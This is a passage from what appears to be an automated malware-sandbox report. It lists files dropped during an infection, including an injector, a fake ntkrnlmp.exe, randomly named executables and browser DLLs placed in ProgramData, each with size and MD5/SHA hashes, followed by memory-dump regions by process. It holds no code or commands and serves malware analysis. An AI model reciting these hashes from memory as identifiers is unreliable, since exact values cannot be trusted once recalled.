              4f633edb62de05f3d7c241c8bc19c1e0be7ced75

              SHA256

              61f9194b9f33611ec902f02755cf2e86f0bbc84c2102c6e5d1874f9bae78e551

              SHA512

              31e1fce9aca3b5d9afc85640af04b4542b9897f7d60b699e3153516137d9358d3c101cacc04e9e594e36b8622e9489cecf0dda210662563565d80fb9a33549b3

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
              Filesize

              281KB

              MD5

              d98e33b66343e7c96158444127a117f6

              SHA1

              bb716c5509a2bf345c6c1152f6e3e1452d39d50d

              SHA256

              5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1

              SHA512

              705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt
              Filesize

              2KB

              MD5

              32525aa8cb26aa6a7080db9328a760c7

              SHA1

              f0ca1a84fe3fa4b0c899a3dccfffb90b6f9f7a83

              SHA256

              c5b9fd390df1bedd54aad14158b2c80ec1541e01404ab79ad6ff65161ce143c1

              SHA512

              35f641d594586331748579017c6d26415fbfe4c36c66c939460e878beecfa67a4ba6f68ffeef75201330ba473c2fd72bc6abdf97e2cec87c65647a4343384f11

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt
              Filesize

              3KB

              MD5

              02a88c482c5bcb357a3a820ab30120f3

              SHA1

              7ee896d800dfdd58721eaa5bcc72c07642d85853

              SHA256

              ec370238392c20b0abffad0888d9bba234c88f65c8a66338da9732adc69e85fc

              SHA512

              783b3a325b6d86bfd7079fbb3a406e729cfec8f8e64375ff93f7e7121814e281d62a290e55d7636572dc2f2fd97a6ac0976688baf7e5ded32946966116b2bd5c

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
              Filesize

              5.3MB

              MD5

              1afff8d5352aecef2ecd47ffa02d7f7d

              SHA1

              8b115b84efdb3a1b87f750d35822b2609e665bef

              SHA256

              c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1

              SHA512

              e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\osloader.exe
              Filesize

              591KB

              MD5

              e2f68dc7fbd6e0bf031ca3809a739346

              SHA1

              9c35494898e65c8a62887f28e04c0359ab6f63f5

              SHA256

              b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4

              SHA512

              26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\u23w.0.exe
              Filesize

              206KB

              MD5

              0917be53327ea132956255dcab650a82

              SHA1

              b60818917f645a8a9af3b530e3ae37c1f002be2f

              SHA256

              211c34660898480e0777c6ef6f61bf2111f6550e00b40cab859543d567dc455a

              SHA512

              a72acc24ba813d983bbf2ecab7929d0aab4e25637ae43e85b973a5105429bd15c061415fd855737620caaf81b456b2d6ba57f85566245efbe5f8b5db5560932a

              Download Submit

            • C:\Users\Admin\Pictures\9vHJJFiKQG3A5il8SIXTMMso.exe
              Filesize

              213KB

              MD5

              718455b384af2a8caa79eca4c64b7d78

              SHA1

              84993e856abe4c3c90a61f95f02252dfbe94b356

              SHA256

              1e418b3dae341f3196b5c3c23cb11eb071dbb82c77ebef9badfd74e3ddea1aac

              SHA512

              46f51aa5f2fa32f597bbc6e6d375d8d0b9baa2fae2ec68a76fdba63e0d831a514658aa26c137657b8ad1ec653b1f4f5c728b3a61a40f0ba3e0b67a381d02537f

              Download Submit

            • C:\Users\Admin\Pictures\b5tu7XK64n2prVvO6fsfqizw.exe
              Filesize

              4.1MB

              MD5

              0ed8d071deae90ff638cb070d0b9559d

              SHA1

              9b39b4703ccd78d9ca56bbf2f4c168d71a7bcfda

              SHA256

              691bddda01382e95f74905b1fc77da9acbb73383734ca3116075be2c7d62cf99

              SHA512

              960a5a4e2b4f82bb7273cbab8bf622933c6e603cdc44b59b409c285b62c3a2c741bca7692ed77864520aa95c85a2f3fc31ddc9383caada588828d953346c2729

              Download Submit

            • C:\Users\Admin\Pictures\rx8aobajQgPi2jYCndovZLgh.exe
              Filesize

              384KB

              MD5

              f969256486cae8c6c357924481ec86ee

              SHA1

              95f91c8a6539700b4dd6077ba3a778c13bc72d4d

              SHA256

              d719fb243a6d2ad33a76aa78ee66f4763a36c78a2373a01de223fb5c27b722da

              SHA512

              106959ab072744ae5ce79cbc627040dbd32bb416407ca7d1f848ae49dbb609f900c0f34696fc5e30c5418d889b5c07b35d5a0f9b4f1be1e662621ba2c4491e16

              Download Submit

            • \ProgramData\mozglue.dll
              Filesize

              593KB

              MD5

              c8fd9be83bc728cc04beffafc2907fe9

              SHA1

              95ab9f701e0024cedfbd312bcfe4e726744c4f2e

              SHA256

              ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

              SHA512

              fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

              Download Submit

            • \ProgramData\nss3.dll
              Filesize

              2.0MB

              MD5

              1cc453cdf74f31e4d913ff9c10acdde2

              SHA1

              6e85eae544d6e965f15fa5c39700fa7202f3aafe

              SHA256

              ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

              SHA512

              dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

              Download Submit

            • \Users\Admin\AppData\Local\Temp\csrss\patch.exe
              Filesize

              1.7MB

              MD5

              13aaafe14eb60d6a718230e82c671d57

              SHA1

              e039dd924d12f264521b8e689426fb7ca95a0a7b

              SHA256

              f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

              SHA512

              ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

              Download Submit

            • \Users\Admin\AppData\Local\Temp\dbghelp.dll
              Filesize

              1.5MB

              MD5

              f0616fa8bc54ece07e3107057f74e4db

              SHA1

              b33995c4f9a004b7d806c4bb36040ee844781fca

              SHA256

              6e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026

              SHA512

              15242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c

              Download Submit

            • \Users\Admin\AppData\Local\Temp\symsrv.dll
              Filesize

              163KB

              MD5

              5c399d34d8dc01741269ff1f1aca7554

              SHA1

              e0ceed500d3cef5558f3f55d33ba9c3a709e8f55

              SHA256

              e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f

              SHA512

              8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d

              Download Submit

            • \Users\Admin\AppData\Local\Temp\u23w.1.exe
              Filesize

              4.6MB

              MD5

              397926927bca55be4a77839b1c44de6e

              SHA1

              e10f3434ef3021c399dbba047832f02b3c898dbd

              SHA256

              4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7

              SHA512

              cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954

              Download Submit

            • \Users\Admin\Pictures\KPcbTjyc1Nc17ug04VHlsq43.exe
              Filesize

              4.1MB

              MD5

              f6156b63d313f7247432a693de39daef

              SHA1

              bff890bf23551db49d04af57779630bea35356a9

              SHA256

              f148a51481ad34b81dbdc1c27873ca0e4d56c83729dcf8ed891f4443f5492620

              SHA512

              54c61e755d5661da14ebfef93b9fa61d02f59fb43edc1310cf21c0780479bc54be973836286f0d5104a946e9d511e94162d38e2a5471f0f386b7b7e396e7f759

              Download Submit

            • \Users\Admin\Pictures\h0leOmUjjNKQgXZ4Ub4iSUF3.exe
              Filesize

              2.8MB

              MD5

              d41fd1ea6e0ca0032be2174317f60fd8

              SHA1

              60f001b9d201259aa333e9b202e4ab5648d16bf3

              SHA256

              3c56d175e67df7e1664bbedd95abee57cf93a7aceaf80374ede4ce1fc4a30990

              SHA512

              a4ce799f1ce9157d053dcb1694dcb127d98e994eb55cecb484ace1c192cf80a1fbfb7b8de94851a49e915cafebc568f70ce07b912e5901387ed90639c692c16e

              Download Submit

            • memory/628-574-0x0000000140000000-0x000000014097B000-memory.dmp

              Filesize

              9.5MB

              Download

            • memory/628-522-0x000000001EBF0000-0x000000001ECFA000-memory.dmp

              Filesize

              1.0MB

              Download

            • memory/628-482-0x0000000000E40000-0x0000000004674000-memory.dmp

              Filesize

              56.2MB

              Download

            • memory/628-524-0x0000000000D20000-0x0000000000D2C000-memory.dmp

              Filesize

              48KB

              Download

            • memory/628-525-0x0000000000D10000-0x0000000000D24000-memory.dmp

              Filesize

              80KB

              Download

            • memory/628-526-0x0000000005C50000-0x0000000005C74000-memory.dmp

              Filesize

              144KB

              Download

            • memory/628-523-0x0000000000B50000-0x0000000000B60000-memory.dmp

              Filesize

              64KB

              Download

            • memory/628-535-0x0000000140000000-0x000000014097B000-memory.dmp

              Filesize

              9.5MB

              Download

            • memory/628-575-0x0000000140000000-0x000000014097B000-memory.dmp

              Filesize

              9.5MB

              Download

            • memory/628-545-0x0000000005AB0000-0x0000000005ABA000-memory.dmp

              Filesize

              40KB

              Download

            • memory/628-551-0x000000001E430000-0x000000001E43C000-memory.dmp

              Filesize

              48KB

              Download

            • memory/628-538-0x000000001F3E0000-0x000000001F492000-memory.dmp

              Filesize

              712KB

              Download

            • memory/628-537-0x0000000000CE0000-0x0000000000D0A000-memory.dmp

              Filesize

              168KB

              Download

            • memory/628-536-0x000000001E4B0000-0x000000001E4BA000-memory.dmp

              Filesize

              40KB

              Download

            • memory/628-546-0x000000001E420000-0x000000001E42A000-memory.dmp

              Filesize

              40KB

              Download

            • memory/628-547-0x000000001E440000-0x000000001E4A2000-memory.dmp

              Filesize

              392KB

              Download

            • memory/628-548-0x000000001E9B0000-0x000000001E9D2000-memory.dmp

              Filesize

              136KB

              Download

            • memory/628-539-0x00000000005F0000-0x00000000005FA000-memory.dmp

              Filesize

              40KB

              Download

            • memory/628-543-0x000000001FBB0000-0x000000001FEB0000-memory.dmp

              Filesize

              3.0MB

              Download

            • memory/840-0-0x000000013F170000-0x000000013F4ED000-memory.dmp

              Filesize

              3.5MB

              Download

            • memory/840-11-0x000000013F170000-0x000000013F4ED000-memory.dmp

              Filesize

              3.5MB

              Download

            • memory/852-481-0x0000000000400000-0x0000000002AF1000-memory.dmp

              Filesize

              38.9MB

              Download

            • memory/852-325-0x0000000061E00000-0x0000000061EF3000-memory.dmp

              Filesize

              972KB

              Download

            • memory/852-436-0x0000000000400000-0x0000000002AF1000-memory.dmp

              Filesize

              38.9MB

              Download

            • memory/868-237-0x0000000003110000-0x0000000003508000-memory.dmp

              Filesize

              4.0MB

              Download

            • memory/868-345-0x0000000000400000-0x0000000002ED5000-memory.dmp

              Filesize

              42.8MB

              Download

            • memory/1196-387-0x0000000003E50000-0x0000000003E66000-memory.dmp

              Filesize

              88KB

              Download

            • memory/1540-346-0x0000000003160000-0x0000000003558000-memory.dmp

              Filesize

              4.0MB

              Download

            • memory/1540-404-0x0000000000400000-0x0000000002ED5000-memory.dmp

              Filesize

              42.8MB

              Download

            • memory/1584-305-0x00000000030A0000-0x0000000003498000-memory.dmp

              Filesize

              4.0MB

              Download

            • memory/1584-391-0x0000000000400000-0x0000000002ED5000-memory.dmp

              Filesize

              42.8MB

              Download

            • memory/1876-388-0x0000000000400000-0x0000000002AF2000-memory.dmp

              Filesize

              38.9MB

              Download

            • memory/1916-400-0x0000000000400000-0x0000000002ED5000-memory.dmp

              Filesize

              42.8MB

              Download

            • memory/1916-343-0x0000000003220000-0x0000000003618000-memory.dmp

              Filesize

              4.0MB

              Download

            • memory/1944-340-0x0000000003170000-0x0000000003568000-memory.dmp

              Filesize

              4.0MB

              Download

            • memory/1944-406-0x0000000000400000-0x0000000002ED5000-memory.dmp

              Filesize

              42.8MB

              Download

            • memory/1996-4-0x0000000000400000-0x0000000000408000-memory.dmp

              Filesize

              32KB

              Download

            • memory/1996-437-0x0000000074680000-0x0000000074D6E000-memory.dmp

              Filesize

              6.9MB

              Download

            • memory/1996-1-0x0000000000400000-0x0000000000408000-memory.dmp

              Filesize

              32KB

              Download

            • memory/1996-12-0x000000007468E000-0x000000007468F000-memory.dmp

              Filesize

              4KB

              Download

            • memory/1996-13-0x0000000074680000-0x0000000074D6E000-memory.dmp

              Filesize

              6.9MB

              Download

            • memory/1996-534-0x0000000008DE0000-0x000000000975B000-memory.dmp

              Filesize

              9.5MB

              Download

            • memory/1996-180-0x0000000008DE0000-0x000000000975B000-memory.dmp

              Filesize

              9.5MB

              Download

            • memory/1996-10-0x0000000000400000-0x0000000000408000-memory.dmp

              Filesize

              32KB

              Download

            • memory/1996-3-0x0000000000400000-0x0000000000408000-memory.dmp

              Filesize

              32KB

              Download

            • memory/1996-8-0x0000000000400000-0x0000000000408000-memory.dmp

              Filesize

              32KB

              Download

            • memory/1996-2-0x0000000000400000-0x0000000000408000-memory.dmp

              Filesize

              32KB

              Download

            • memory/1996-6-0x0000000000400000-0x0000000000408000-memory.dmp

              Filesize

              32KB

              Download

            • memory/1996-5-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

              Filesize

              4KB

              Download

            • memory/1996-403-0x000000007468E000-0x000000007468F000-memory.dmp

              Filesize

              4KB

              Download

            • memory/2084-713-0x0000000000400000-0x00000000008E1000-memory.dmp

              Filesize

              4.9MB

              Download

            • memory/2084-716-0x0000000000400000-0x00000000008E1000-memory.dmp

              Filesize

              4.9MB

              Download

            • memory/2176-638-0x0000000000400000-0x0000000002ED5000-memory.dmp

              Filesize

              42.8MB

              Download

            • memory/2176-714-0x000000002F820000-0x000000002FD01000-memory.dmp

              Filesize

              4.9MB

              Download

            • memory/2176-731-0x000000002F820000-0x00000000300ED000-memory.dmp

              Filesize

              8.8MB

              Download

            • memory/2176-730-0x000000002F820000-0x000000002FD01000-memory.dmp

              Filesize

              4.9MB

              Download

            • memory/2176-722-0x000000002F820000-0x00000000300ED000-memory.dmp

              Filesize

              8.8MB

              Download

            • memory/2176-555-0x0000000000400000-0x0000000002ED5000-memory.dmp

              Filesize

              42.8MB

              Download

            • memory/2176-401-0x0000000003190000-0x0000000003588000-memory.dmp

              Filesize

              4.0MB

              Download

            • memory/2176-588-0x0000000000400000-0x0000000002ED5000-memory.dmp

              Filesize

              42.8MB

              Download

            • memory/2176-712-0x000000002F820000-0x000000002FD01000-memory.dmp

              Filesize

              4.9MB

              Download

            • memory/2176-630-0x0000000000400000-0x0000000002ED5000-memory.dmp

              Filesize

              42.8MB

              Download

            • memory/2176-626-0x0000000000400000-0x0000000002ED5000-memory.dmp

              Filesize

              42.8MB

              Download

            • memory/2176-616-0x0000000000400000-0x0000000002ED5000-memory.dmp

              Filesize

              42.8MB

              Download

            • memory/2224-354-0x0000000000400000-0x0000000002ED5000-memory.dmp

              Filesize

              42.8MB

              Download

            • memory/2224-193-0x00000000030D0000-0x00000000034C8000-memory.dmp

              Filesize

              4.0MB

              Download

            • memory/2264-185-0x0000000140000000-0x000000014097B000-memory.dmp

              Filesize

              9.5MB

              Download

            • memory/2264-402-0x0000000140000000-0x000000014097B000-memory.dmp

              Filesize

              9.5MB

              Download

            • memory/2312-628-0x0000000000400000-0x00000000008DF000-memory.dmp

              Filesize

              4.9MB

              Download

            • memory/2312-623-0x0000000000400000-0x00000000008DF000-memory.dmp

              Filesize

              4.9MB

              Download

            • memory/2516-438-0x0000000140000000-0x00000001405E8000-memory.dmp

              Filesize

              5.9MB

              Download

            • memory/2516-452-0x0000000140000000-0x00000001405E8000-memory.dmp

              Filesize

              5.9MB

              Download

            • memory/2680-480-0x0000000000400000-0x00000000008AD000-memory.dmp

              Filesize

              4.7MB

              Download

            • memory/2716-224-0x0000000003100000-0x00000000034F8000-memory.dmp

              Filesize

              4.0MB

              Download

            • memory/2716-358-0x0000000000400000-0x0000000002ED5000-memory.dmp

              Filesize

              42.8MB

              Download

            • memory/2732-319-0x0000000000400000-0x0000000002B1E000-memory.dmp

              Filesize

              39.1MB

              Download

            • memory/2764-622-0x0000000000400000-0x00000000008DF000-memory.dmp

              Filesize

              4.9MB

              Download

            • memory/2764-625-0x0000000000400000-0x00000000008DF000-memory.dmp

              Filesize

              4.9MB

              Download

            • memory/2944-411-0x0000000000400000-0x0000000002ED5000-memory.dmp

              Filesize

              42.8MB

              Download

            • memory/2944-386-0x0000000002F50000-0x0000000003348000-memory.dmp

              Filesize

              4.0MB

              Download

            • memory/2956-582-0x0000000000400000-0x0000000002B10000-memory.dmp

              Filesize

              39.1MB

              Download